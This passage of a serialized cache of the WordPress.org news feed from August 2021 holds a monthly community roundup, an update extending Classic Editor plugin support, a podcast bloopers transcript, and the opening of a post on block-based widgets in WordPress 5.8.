11.2</a> adds customizing/color options to the search block, a flex layout for the group block, and a new button for creating posts as part of the publishing flow. <a href=\"https://make.wordpress.org/core/2021/08/18/whats-new-in-gutenberg-11-3-18-august/\">Version 11.3</a> offers a new dimensions panel (replacing the spacing panel) with more styling options, dimensions control for the feature image block, and significant performance improvements for block inserters.<br></p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core Team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the <a href=\"https://wordpress.slack.com/archives/C02QB2JS7\">#core-editor</a> channel in the <a href=\"https://make.wordpress.org/chat/\">Make WordPress Slack</a>. The “<a href=\"https://make.wordpress.org/core/2021/07/21/whats-next-in-gutenberg-site-editing-status-check-late-july-august-2021/\">What’s next in Gutenberg</a>” post offers more details on the latest updates.&nbsp;</p>\n\n\n\n<h2>Get Excited about WordCamp US 2021</h2>\n\n\n\n<p>The biggest WordCamp in North America &#8211; <a href=\"https://us.wordcamp.org/2021/\">WordCamp US 2021-</a> is barely a month away. <a href=\"https://us.wordcamp.org/2021/tickets/\">Get your (free) tickets</a>, if you haven’t already! The organizing team has opened up calls for <a href=\"https://us.wordcamp.org/2021/calling-all-musicians/\">musicians</a>, <a href=\"https://us.wordcamp.org/2021/call-for-contributor-stories/\">contributor stories</a>, and <a href=\"https://us.wordcamp.org/2021/call-for-media-partners/\">media partners</a>. Check out <a href=\"https://us.wordcamp.org/2021/\">the event website</a> and follow the event on <a href=\"https://twitter.com/wordcampus\">Twitter</a>, <a href=\"https://www.instagram.com/wordcampus/\">Instagram</a>, and <a href=\"https://www.facebook.com/WordCampUSA\">Facebook</a> to stay updated on all that #WCUS news.</p>\n\n\n\n<h2>Important Announcements/Updates</h2>\n\n\n\n<ul><li>Support for the Classic Editor plugin <a href=\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\">will be extended for a full year until 2022</a>!</li><li>The Themes Team published a <a href=\"https://make.wordpress.org/themes/2021/08/06/summary-of-the-request-for-feedback-on-requirement-changes/\">feedback summary</a> on the <a href=\"https://make.wordpress.org/themes/2021/07/20/discussion-request-for-feedback-on-requirement-changes/\">proposed requirement changes for WordPress theme review</a>, and will soon be updating the handbook and review tools. You will find more context in their <a href=\"https://make.wordpress.org/themes/2021/08/10/meeting-notes-themes-team-and-theme-authors-regarding-requirements-change/\">meeting notes</a>.</li><li>The Plugins Team <a href=\"https://make.wordpress.org/plugins/2021/08/27/inaccurate-stats-have-been-corrected/\">corrected inaccurate plugin statistics</a> in the plugin directory.</li><li>Check out the <a href=\"https://make.wordpress.org/test/2021/08/17/fse-program-theme-design-survey-results/\">results of the FSE Theme Design (theme.json) survey</a>!</li></ul>\n\n\n\n<h2>Feedback/Testing Requests from Contributor Teams</h2>\n\n\n\n<ul><li>The Testing Team is requesting testing help for a <a href=\"https://make.wordpress.org/test/2021/08/30/week-in-test-30-aug-2021/\">few tickets and patches in WordPress</a>. The team is also looking for volunteers to <a href=\"https://make.wordpress.org/test/2021/08/20/call-for-volunteeers-audit-and-update-testing-instructions-across-the-make-sites/\">audit and update Core testing instructions </a>across different Make sites.</li><li>The Community Team shared a <a href=\"https://make.wordpress.org/community/2021/09/01/proposal-centralized-global-do_action-charity-hackathons/\">proposal on planning online-only recurring global do_action charity hackathons</a>. Share your feedback by September 24.</li><li>The Training Team is also exploring the possibility of adding <a href=\"https://make.wordpress.org/training/2021/08/10/proposal-learner-achievements-on-profiles/\">learner achievements (on learn.wordpress.org) on WP Profiles</a> and is requesting feedback from the community.</li><li>Help the Marketing Team’s outreach research by filling out <a href=\"https://forms.gle/4QFhX8fcNxKAfK8y5\">this 2 question survey</a> on how you search for WordPress release information. If you have any favorite features from the latest release (WordPress 5.8) let the team know by completing this <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSd_2llymf79-h5sgTiprz7Kw4Gr4cbDHh-AAdAQfiArXlHksg/viewform\">short form</a>.</li><li>Version 18.1 of WordPress for <a href=\"https://make.wordpress.org/mobile/2021/08/23/call-for-testing-wordpress-for-ios-18-1/\">iOS</a> and <a href=\"https://make.wordpress.org/mobile/2021/08/23/call-for-testing-wordpress-for-android-18-1/\">Android</a> are now available for testing!</li></ul>\n\n\n\n<h2>WordPress Event Updates</h2>\n\n\n\n<ul><li><a href=\"https://floripa.wordcamp.org/2021/\">WordCamp Florianopolis 2021</a> was held on August 11-12, 2021. The event, which sold 390 tickets, had 11 speakers and 4 sponsors. Catch the <a href=\"https://www.youtube.com/channel/UCh1CeGfuDRH-o13xh7kpgUQ\">event recap on YouTube</a>!</li><li><a href=\"https://galicia.wordcamp.org/2021/\">WordCamp Galicia 2021</a> is being held from September 30 &#8211; October 2, 2021! </li><li><a href=\"https://doaction.org/event/karnataka-2021/\">do_action Karnataka 2021</a> was held from August 7-15, 2021. Check out <a href=\"https://wordpressfoundation.org/2021/do_action-karnataka-2021-a-report/\">the recap</a>!</li><li>The Core Team organized a <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/\">hallway hangout</a> to compare the ‘experimental’ Gutenberg navigation feature with the built-in core feature. The team decided to wait until feature parity with core nav menus, to move the feature from experiments to the main plugin.</li><li>The Diverse Speakers Training group (<a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">#WPDiversity</a>) of the Community Team held their first “<a href=\"https://make.wordpress.org/community/2021/09/02/report-diverse-speaker-workshops-august-2021/\">Allyship for WordPress Event Organizers</a>” workshop on August 19, 2021. The event had 13 attendees from six countries who reported a 52% increase in preparedness to help create inclusive WordPress events. <a href=\"https://make.wordpress.org/community/tag/wpdiversityworkshops/\">Stay tuned</a> for their next workshop in November!</li></ul>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further Reading</h2>\n\n\n\n<ul><li>Don’t miss this blog post on <a href=\"https://wordpress.org/news/2021/08/widgets-in-wordpress-5-8-and-beyond/\">Widgets in WordPress 5.8 and beyond</a>!</li><li>The Full Site Editing (FSE) Outreach program wrapped up its ninth challenge –– <a href=\"https://make.wordpress.org/test/2021/08/11/fse-program-testing-call-9-handling-highered-headers/\">Handling HigherEd Headers</a>, on September 1. Keep an eye out for <a href=\"https://make.wordpress.org/test/tag/fse-outreach-program/\">test results and future testing call announcements</a>!</li><li>The Test Team is <a href=\"https://make.wordpress.org/test/2021/08/19/test-team-chat-summary-17-august-2021/\">attempting to modernize PHPUnit tests</a> for WordPress.</li><li>The Accessibility Team is testing the <a href=\"https://make.wordpress.org/accessibility/2021/08/20/accessibility-team-meeting-notes-august-20-2021/\">navigation block</a> for accessibility feedback.</li><li>The Docs Team <a href=\"https://make.wordpress.org/docs/2021/08/31/summary-of-docs-team-meeting-aug-24-2021/\">launched a new repository</a> for tracking issues with WordPress documentation: <a href=\"https://github.com/WordPress/Documentation-Issue-Tracker\">https://github.com/WordPress/Documentation-Issue-Tracker</a></li><li>The Training Team <a href=\"https://make.wordpress.org/training/2021/08/17/proposal-brand-guidelines-for-learn-wordpress-content/#comment-3130\">finalized</a> brand <a href=\"https://make.wordpress.org/training/2021/08/17/proposal-brand-guidelines-for-learn-wordpress-content/\">guidelines</a> for <a href=\"https://learn.wordpress.org\">learn.wordpress.org</a>. The team is also working on setting up <a href=\"https://make.wordpress.org/training/2021/08/12/wordpress-101-microcourses-proposal/\">Micro courses for Learn</a>.</li><li>The Openverse Team is <a href=\"https://make.wordpress.org/openverse/2021/08/16/multi-stage-docker-builds-in-the-openverse-api/\">exploring Multistage docker builds</a> as a solution to better set up waveforms for audio search results in the Openverse tool.&nbsp;</li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it using this form</em></a><em>.&nbsp;</em></p>\n\n\n\n<p><em>The following folks contributed to August’s Month in WordPress:&nbsp; <a href=\'https://profiles.wordpress.org/evarlese/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>evarlese</a> <a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a> <em><a href=\'https://profiles.wordpress.org/nao/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>nao</a></em> <a href=\'https://profiles.wordpress.org/jillbinder/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jillbinder</a></em> <em><a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11176\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"An Update on the Classic Editor Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2021/08/an-update-on-the-classic-editor-plugin/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Aug 2021 16:51:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11149\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:333:\"Before the release of WordPress 5.0 in 2018, the Classic Editor plugin was published to help ease the transition to the new block editor. At the time, we promised to support the plugin through 2021 and adjust if needed as the deadline got closer. After discussing this with Matt, it&#8217;s clear that continuing to support [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Josepha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1583:\"\n<p>Before the release of WordPress 5.0 in 2018, the <a href=\"https://wordpress.org/plugins/classic-editor/\">Classic Editor plugin</a> was published to help ease the transition to the new block editor. At the time, we promised to support the plugin through 2021 and adjust if needed as the deadline got closer. After discussing this with Matt, it&#8217;s clear that continuing to support the plugin through 2022 is the right call for the project as well as the community.</p>\n\n\n\n<p>Still, if you’ve been putting off using the block editor, this is an excellent time to give it another shot. Since it first appeared in 2018, hundreds of WordPress contributors have made a lot of updates based on user feedback. You will be pleasantly surprised at how far it’s come!</p>\n\n\n\n<p>Big thanks to everyone who has been working on WordPress, Gutenberg, and the Classic Editor plugin. And thank you to every WordPress user and tester who has provided the feedback we need to make the software even better.</p>\n\n\n\n<p>~ Josepha</p>\n\n\n\n<p><em>Returning to the block editor for the first time in a long time? You can give feedback early in the process by <a href=\"https://make.wordpress.org/test/handbook/full-site-editing-outreach-experiment/\">joining the outreach program</a>! Looking at it for the first time ever? <a href=\"https://learn.wordpress.org/workshops/?series=24&amp;topic=&amp;language=&amp;captions=\">Get your bearings with some workshops</a> or <a href=\"https://wordpress.org/support/article/wordpress-editor/#how-does-the-block-editor-work\">check out this demo</a>!</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11149\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WP Briefing: Episode 15: A Very WordPress Blooper\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2021/08/episode-15-a-very-wordpress-blooper/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Aug 2021 22:14:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=11146\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:130:\"Ever wonder what it\'s like behind the scenes of WP Briefing? Listen in on this episode for a little levity and Josepha\'s bloopers.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:65:\"https://wordpress.org/news/files/2021/08/WP-Briefing-Bloopers.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8885:\"\n<p>Ever wonder what it&#8217;s like behind the scenes of WP Briefing? Listen in on this episode for a little levity and Josepha&#8217;s bloopers.</p>\n\n\n\n<p><em><strong>Have a question you’d like answered? You can submit them to&nbsp;<a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-11146\"></span>\n\n\n\n<p>[contemporary intro music]</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:10</p>\n\n\n\n<p>Hello, everyone, and welcome to a bonus briefing. Normally I talk to you about WordPress and stuff, but I figured that we all need a little levity in our lives right now. So today&#8217;s episode is actually just a series of bloopers and mistakes that I&#8217;ve made while recording. When I was preparing for this podcast, no one mentioned the deep weirdness of standing alone in your closet talking to yourself, nor did they realize just how lost I can get in the surpassingly, lovely lyricism of a lilting line, and then just have no idea what I&#8217;m supposed to be reading in the script that I wrote for myself. So, my dear friends, I hope these bring you a little laugh. And if we&#8217;ve got any luck at all, you may also hear me singing to myself, my computer, or about how terrible my talking just was. Here we go!</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:12</p>\n\n\n\n<p>Hello, everyone, and welcome to a bonus briefing. I know I wasn&#8217;t going to sit boop, boop.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:21</p>\n\n\n\n<p>I messed up the thing where I&#8217;m talking about how I mess up, of course. I&#8217;m going to do it one more time, and you can choose whatever is a reasonable thing there.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:33</p>\n\n\n\n<p>Because we had such a lengthy WP Briefing, WordPress, I’m going to just start that over again. Sorry, everyone.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:42</p>\n\n\n\n<p>My friends. Oh, no. I don&#8217;t know how I end my own show. How do I end my own show? There we go. Sorry.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:52</p>\n\n\n\n<p>That was a weird way to say that. I&#8217;m going to start over again from the transition. And then we&#8217;re just going to go straight through to the end. Maybe.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:03</p>\n\n\n\n<p>The names that&#8230; I sound weird. I sound like I don&#8217;t know what my words are. And I said I wrote the words. I said I was all going to go in one go, and I&#8217;m a liar today. Okay, here we go. For realsies!</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:16</p>\n\n\n\n<p>Final first last take. Here we go. Sorry, I made myself laugh.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:22</p>\n\n\n\n<p>Matt Mullenweg. And, and I, I&#8217;m also in that group. I don&#8217;t know why I said that like it was a surprise. I have me too. I&#8217;m also in there.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:33</p>\n\n\n\n<p>Ugh, I ran out of air. For reasons, it was a short sentence. I don&#8217;t know why I ran out of air.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:43</p>\n\n\n\n<p>Coming out on April 14. That&#8217;s not true. It&#8217;s April 13. Right?</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:50</p>\n\n\n\n<p>On the form below to share the. Pfft &#8211; what are the things!&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:58</p>\n\n\n\n<p>This is WP Briefing episode seven, no title because I don&#8217;t know what to call it because I gave it a title already. I gave it two titles, and then couldn&#8217;t remember why I gave it those titles. So I&#8217;ll come up with a title before we publish it. But I also have no idea what it is. I&#8217;m going to ask for help. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:17</p>\n\n\n\n<p>Testing project since I have too many commas, and I really believed in my comma when I said it. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:24</p>\n\n\n\n<p>Prior to Gutenberg&#8230; pfft. Open source software like WordPress. I was going to smash that sentence into half a sentence. I was going to say when you know what you&#8217;re workussing on you have a solution which is not my friends of thing. So, I am just going to say the sentence again. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:47</p>\n\n\n\n<p>I was sitting over here wringing my hands for some reason during that entire list. And so if you can hear me wringing my hands, which would be a whole new height of anxiety for anyone, you let me know, and I will rerecord that also.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:00</p>\n\n\n\n<p>Get a concept of. Nope, this is a lie. Get a concept of where to get your tickets is the silliest thing. I&#8217;m starting over from the small list of big things. Also, because I got too excited about how big my list is. I am going to get that excited again. But I will try not to shout about it.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:17</p>\n\n\n\n<p>&#8220;Humming intro song&#8221; Dun dun dun dun dun.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:23</p>\n\n\n\n<p>Sorry, I had to scroll up, and I try not to scroll up when I&#8217;m talking in case maybe my whole computer turns into a microphone. Sorry, I&#8217;m just going to keep going because this has been a fine take so far.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:34</p>\n\n\n\n<p>Mercy! I have words that I can say with my mouth. They aren&#8217;t these words today. It seems.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:45</p>\n\n\n\n<p>Build up to&#8230; Oh my goodness. My stomach grumbled, and this microphone, I know,&nbsp; picked it up. And so I&#8217;m going to redo bullet two so that we don&#8217;t just have a small monster under the bed in the middle of the podcast.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:03</p>\n\n\n\n<p>Also, like DEI, I feel s—Eh &#8211; maybe I should say, DEI, somewhere in there, so it&#8217;s clear for people cause I&#8217;m talking to people and not actually a screen. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:17</p>\n\n\n\n<p>Before I joined the WordPress project, the majority of my work with accessibility was in the context of the digital divide. Now, when talking about the digital divide, there are three concepts around quote-unquote, getting things to people. And those concepts are&#8230; I guess I could say the thing, hold on one second, I can do it. I feel like I&#8217;m chopping up my words like I&#8217;m not really breathing very well. So I apologize. But here we go again.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:58</p>\n\n\n\n<p>Don&#8217;t include that one. Sorry, I&#8217;m so nervous about this episode that, like, my mouth is getting dry, and I worry that you can hear it, and it drives me nuts every time I hear podcasters with a dry mouth, and you can just like hear it clicking and always stresses me out. I&#8217;m like, someone should give that poor thing a drink of water. And I just know I&#8217;m going to feel that way about myself later. And so I&#8217;m trying to stay hydrated, but it also means that I have to stop every two paragraphs and take a drink of water. I apologize for that interlude. I am about to start again, at my next section, which is like, halfway through.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:39</p>\n\n\n\n<p>Also, I learned that you can hear me swallowing my water with this microphone because it is a spectacular microphone. And so, I apologize for that as well. All right. Here I go. I&#8217;m going to do it all in one take. Watch me.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:56</p>\n\n\n\n<p>But I also have questions, especially about how to move everything forward. Mm-hmm. Whoops. I put especially in the wrong spot. But I also thought&#8230;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:10</p>\n\n\n\n<p> Ta da, we did it. Gosh, that&#8217;s a short one. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:16</p>\n\n\n\n<p>I did it. Where&#8217;s my where&#8217;s my turning offing button.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:22</p>\n\n\n\n<p>Tada! And scene and done.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11146\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Widgets in WordPress 5.8 and Beyond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2021/08/widgets-in-wordpress-5-8-and-beyond/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Aug 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11115\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:367:\"Copy and Design by @critterverse WordPress 5.8 brings the power of Gutenberg blocks to widget areas — which means the highly customizable layout and styling options bring you closer to a&#160;WYSIWYG editing experience. I made a test site based on the oldie-but-goodie Twenty Sixteen theme, with three separate widget areas. In this post, I’ll highlight [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:3:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/08/classic-widgets.mov\";s:6:\"length\";s:7:\"6475399\";s:4:\"type\";s:15:\"video/quicktime\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/08/block-widgets-1.mov\";s:6:\"length\";s:8:\"23931847\";s:4:\"type\";s:15:\"video/quicktime\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:58:\"https://wordpress.org/news/files/2021/08/custom-html-1.mov\";s:6:\"length\";s:8:\"13767042\";s:4:\"type\";s:15:\"video/quicktime\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe 